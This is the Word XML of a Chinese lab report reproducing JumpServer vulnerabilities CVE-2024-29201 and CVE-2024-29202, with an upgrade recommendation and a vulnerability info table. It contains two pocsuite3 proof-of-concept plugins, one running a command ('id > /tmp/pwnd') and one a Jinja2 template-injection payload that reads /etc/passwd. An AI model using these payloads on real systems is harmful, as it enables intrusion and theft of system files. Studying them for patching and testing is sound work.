      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明我们的漏洞复现成功！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A86AE1" w14:textId="79A54A6D" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc172983149"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="1D18E7D2" w14:textId="381E83A0" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DC1C4A" w:rsidRPr="00DC1C4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新到最新版本即可避免该漏洞的利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8231F6" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc23034"/>
      <w:bookmarkStart w:id="27" w:name="_Toc10352"/>
      <w:bookmarkStart w:id="28" w:name="_Toc172983150"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="20C39FEF" w14:textId="6DD262D9" w:rsidR="00C60920" w:rsidRPr="002C4053" w:rsidRDefault="002C4053" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="002C4053">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据上述的漏洞复现过程进行一一执行即可，观察数据库中是否植入</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4053">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwnd</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4053">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDB4714" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc75461104"/>
      <w:bookmarkStart w:id="30" w:name="_Toc28030"/>
      <w:bookmarkStart w:id="31" w:name="_Toc10303"/>
      <w:bookmarkStart w:id="32" w:name="_Toc172983151"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试中所用的工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="44E328FF" w14:textId="567F0F56" w:rsidR="00757A7B" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003C1C1E">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00757A7B">
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="00757A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>umpserver</w:t>
      </w:r>
      <w:r w:rsidR="00757A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开源堡垒机；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E731D64" w14:textId="5808650B" w:rsidR="00757A7B" w:rsidRDefault="00757A7B" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDECE7F" w14:textId="5F0745F3" w:rsidR="00757A7B" w:rsidRDefault="00A96E2E" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Celery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76428708" w14:textId="34FC2C3E" w:rsidR="00C60920" w:rsidRPr="003C1C1E" w:rsidRDefault="003C1C1E" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="003C1C1E">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="003C1C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ali</w:t>
      </w:r>
      <w:r w:rsidR="00A42F86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714323A8" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="34" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="35" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="36" w:name="_Toc172983152"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/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分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="49A530E5" w14:textId="4D6748EC" w:rsidR="00644655" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc172983153"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.1 POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="12A1347D" w14:textId="4E64404A" w:rsidR="00644655" w:rsidRPr="00644655" w:rsidRDefault="00644655" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644655">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2024-29201</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B710D" w14:textId="3276488F" w:rsidR="00D615F1" w:rsidRPr="00D615F1" w:rsidRDefault="00644655" w:rsidP="00854B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!/usr/bin/env python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coding: utf-8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csuite.api.request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req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csuite.api.poc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register, Output, POCBase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csuite.thirdparty.guanxing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parse_ip_port, http_packet, make_verify_url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JumpServerPOC(POCBase)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vulID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CVE-2024-29201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lastRenderedPageBreak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veID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CVE-2024-29201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vdID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nvdID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version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1.0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uthor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陆皓喆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 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作者名称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vulDat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2024-05' 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漏洞发现日期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reateDat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2024-07-24' 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POC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创建日期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updateDat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2024-07-24' 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POC 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更新日期</w:t>
      </w:r>
      <w:r w:rsidRPr="00644655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nam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JumpServer Remote Code Execution Vulnerability (CVE-2024-29201)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desc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'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This is a POC for the remote code execution vulnerability in JumpServer (CVE-2024-29201).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It demonstrates how to exploit the vulnerability and verify the exploit result.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''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olution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Upgrade to version v3.10.7 or later.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everity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Critical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vulTyp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Remote Code Execution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askTyp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verify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references = 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https://blog.csdn.net/qq_43355651/article/details/137275412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appName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JumpServer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ppVersion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V3.0.0 &lt;= JumpServer &lt;= V3.10.6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ppPowerLink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https://www.jumpserver.org/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samples = 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install_requires = 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pocsuite3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_attack(self)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self._verify(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_verify(self)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self.url, ip, port = parse_ip_port(self.target, </w:t>
      </w:r>
      <w:r w:rsidRPr="00644655">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1750EB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>80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result = {}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headers = {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Content-Type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application/x-www-form-urlencoded; charset=UTF-8'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}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payload =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"id &gt; /tmp/pwnd"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vul_url = make_verify_url(self.url, payload, mod=</w:t>
      </w:r>
      <w:r w:rsidRPr="00644655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resp = req.get(vul_url, headers=headers, verify=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, allow_redirects=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, timeout=</w:t>
      </w:r>
      <w:r w:rsidRPr="00644655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resp.status_code == </w:t>
      </w:r>
      <w:r w:rsidRPr="00644655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00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nd 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uid='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resp.text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result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VerifyInfo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 = http_packet(resp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result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VerifyInfo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URL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 = vul_url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result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VerifyInfo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port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] = port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self.parse_output(result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parse_output(self, result)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output = Output(self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result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output.success(result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output.fail(</w:t>
      </w:r>
      <w:r w:rsidRPr="00644655">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'Failed'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644655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t>output</w:t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644655">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>register(JumpServerPOC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58411313" w14:textId="2C49687D" w:rsidR="00D615F1" w:rsidRPr="00374C22" w:rsidRDefault="00D615F1" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00374C22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2024-29202</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA35E36" w14:textId="77777777" w:rsidR="00374C22" w:rsidRPr="00374C22" w:rsidRDefault="00374C22" w:rsidP="00854BD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Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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#!/usr/bin/env python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># coding: utf-8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csuite.api.request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req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csuite.api.poc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register, Output, POCBase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from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pocsuite.thirdparty.guanxing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mport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parse_ip_port, http_packet, make_verify_url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class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JumpServerJinja2POC(POCBase)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vulID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CVE-2024-29202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veID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CVE-2024-29202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vdID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nnvdID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version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1.0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uthor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陆皓喆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 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作者名称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vulDat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2024-04' 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漏洞发现日期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createDat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2024-07-24' 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POC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创建日期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updateDat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2024-07-24' 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 xml:space="preserve"># POC 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t>更新日期</w:t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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak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nam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JumpServer Jinja2 Template Injection Vulnerability (CVE-2024-29202)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desc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'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This is a POC for the Jinja2 template injection vulnerability in JumpServer (CVE-2024-29202).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It demonstrates how to exploit the vulnerability and verify the exploit result.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''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olution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Upgrade to version v3.10.7 or later.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severity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Critical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vulTyp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Template Injection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taskTyp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verify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references = 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https://blog.csdn.net/qq_43355651/article/details/137275412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appName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JumpServer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ppVersion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V3.0.0 &lt;= JumpServer &lt;= V3.10.6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appPowerLink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https://www.jumpserver.org/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samples = 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install_requires = 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pocsuite3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_attack(self)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self._verify(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_verify(self)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self.url, ip, port = parse_ip_port(self.target, </w:t>
      </w:r>
      <w:r w:rsidRPr="00374C22">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1750EB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>80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result = {}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headers = {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Content-Type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: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application/x-www-form-urlencoded; charset=UTF-8'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}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payload =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"name={{''.__class__.__mro__[2].__subclasses__()[44]('/etc/passwd').read()}}"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vul_url = make_verify_url(self.url, payload, mod=</w:t>
      </w:r>
      <w:r w:rsidRPr="00374C22">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1750EB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0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resp = req.get(vul_url, headers=headers, verify=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, allow_redirects=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>False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, timeout=</w:t>
      </w:r>
      <w:r w:rsidRPr="00374C22">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1750EB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10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 xml:space="preserve">resp.status_code == </w:t>
      </w:r>
      <w:r w:rsidRPr="00374C22">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1750EB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">200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and 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 xml:space="preserve">'root:x:0:0:root:/root:/bin/bash'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n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resp.text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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            result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VerifyInfo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 = http_packet(resp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result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VerifyInfo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URL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 = vul_url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result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VerifyInfo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[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port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] = port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self.parse_output(result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def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parse_output(self, result)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output = Output(self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if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result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output.success(result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>else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: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    output.fail(</w:t>
      </w:r>
      <w:r w:rsidRPr="00374C22">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'Failed'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)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 xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00374C22">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">return 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t>output</w:t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</w:r>
      <w:r w:rsidRPr="00374C22">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>register(JumpServerJinja2POC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A4687D" w14:textId="77777777" w:rsidR="00D615F1" w:rsidRPr="00374C22" w:rsidRDefault="00D615F1" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666C6E38" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc172983154"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="68CD5899" w14:textId="25B5A38E" w:rsidR="00C60920" w:rsidRPr="009F0008" w:rsidRDefault="009F0008" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F0008">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2024-29201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644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="1569"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C60920" w14:paraId="64223EF6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28CCC1E5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UVD-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3FA3" w14:textId="5CB25B5C" w:rsidR="00C60920" w:rsidRDefault="00932B6E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CVE-2024-29201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13B10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类别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AF66" w14:textId="3822F87C" w:rsidR="00C60920" w:rsidRDefault="00932B6E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远程代码执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BCCD0B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VE-I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BE6" w14:textId="43B4D3CB" w:rsidR="00C60920" w:rsidRDefault="00932B6E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CVE-2024-29201</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="19379952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10D65F9A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披露</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>发现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5092" w14:textId="74EB800E" w:rsidR="00C60920" w:rsidRDefault="00932B6E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2024-04-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5984E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bugtraq</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:kern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0A2B4" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920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EC056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NVD-ID</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21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58121" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920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0920" w14:paraId="44ED9FB7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5019976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提交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8FFF6" w14:textId="322EF6C8" w:rsidR="00C60920" w:rsidRDefault="00932B6E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2024-04-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04DC5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发现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4A65" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920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6D7A4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VD-ID</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21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B64F9" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920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0920" w14:paraId="5DC9017F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6B1501AD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等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E2DA8" w14:textId="4366580C" w:rsidR="00C60920" w:rsidRDefault="000D2F26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高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A376A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提交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8586" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920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01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搜索关键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576" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920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C60920" w14:paraId="515F193A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34B58FB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影响范围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419D" w14:textId="71083229" w:rsidR="00C60920" w:rsidRDefault="000A7EE8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0A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">JumpServer V3.0.0 </w:t>
            </w:r>
            <w:r w:rsidRPr="000A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>至</w:t>
            </w:r>
            <w:r w:rsidRPr="000A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> V3.10.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="4384F14F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85793EC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来源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29402" w14:textId="7CFCEFFA" w:rsidR="00C60920" w:rsidRDefault="000A7EE8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0A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>CSDN</w:t>
            </w:r>
            <w:r w:rsidRPr="000A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>博客、腾讯云、</w:t>
            </w:r>
            <w:r w:rsidRPr="000A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>FreeBuf</w:t>
            </w:r>
            <w:r w:rsidRPr="000A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="495E4AAE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="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E2A42B5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简介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FFE2" w14:textId="7701A022" w:rsidR="00C60920" w:rsidRDefault="007346D6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7346D6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">JumpServer </w:t>
            </w:r>
            <w:r w:rsidRPr="007346D6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中存在一个远程代码执行漏洞，允许低权限用户通过构造恶意</w:t>
            </w:r>
            <w:r w:rsidRPr="007346D6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> playbook </w:t>
            </w:r>
            <w:r w:rsidRPr="007346D6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>模板绕过</w:t>
            </w:r>
            <w:r w:rsidRPr="007346D6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ansible </w:t>
            </w:r>
            <w:r w:rsidRPr="007346D6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>输入验证，在</w:t>
            </w:r>
            <w:r w:rsidRPr="007346D6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Celery </w:t>
            </w:r>
            <w:r w:rsidRPr="007346D6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>容器中执行任意代码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="71044E4E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163DD49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详情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1ED3" w14:textId="78C9FE83" w:rsidR="00C60920" w:rsidRDefault="00D9738C" w:rsidP="00854BD6">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9738C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者可以利用漏洞在</w:t>
            </w:r>
            <w:r w:rsidRPr="00D9738C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Celery </w:t>
            </w:r>
            <w:r w:rsidRPr="00D9738C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>容器以</w:t>
            </w:r>
            <w:r w:rsidRPr="00D9738C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> root </w:t>
            </w:r>
            <w:r w:rsidRPr="00D9738C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限执行任意代码，窃取敏感信息或操纵数据库。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="76919800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D3CF561" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000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参考链接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E6B92" w14:textId="095750F7" w:rsidR="00C60920" w:rsidRDefault="00D9738C" w:rsidP="00854BD6">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9738C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>https://blog.csdn.net/qq_43355651/article/details/137275412  https://cloud.tencent.com/developer/article/1589505  https://www.freebuf.com/vuls/255947.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="753F0FCB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4A8141A5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lastRenderedPageBreak/>
              <w:t>靶场信息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2457" w14:textId="3FE80672" w:rsidR="00C60920" w:rsidRDefault="000C46D9" w:rsidP="00854BD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C60920" w14:paraId="4C93D299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F4DD80F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POC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66DEC" w14:textId="434C0AE5" w:rsidR="00C60920" w:rsidRDefault="000C46D9" w:rsidP="00854BD6">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如上所示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="76389BF1" w14:textId="77777777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E030595" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000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修复方案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257" w14:textId="03288F27" w:rsidR="00C60920" w:rsidRDefault="000C46D9" w:rsidP="00854BD6">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>更新至</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.10.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本即可</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
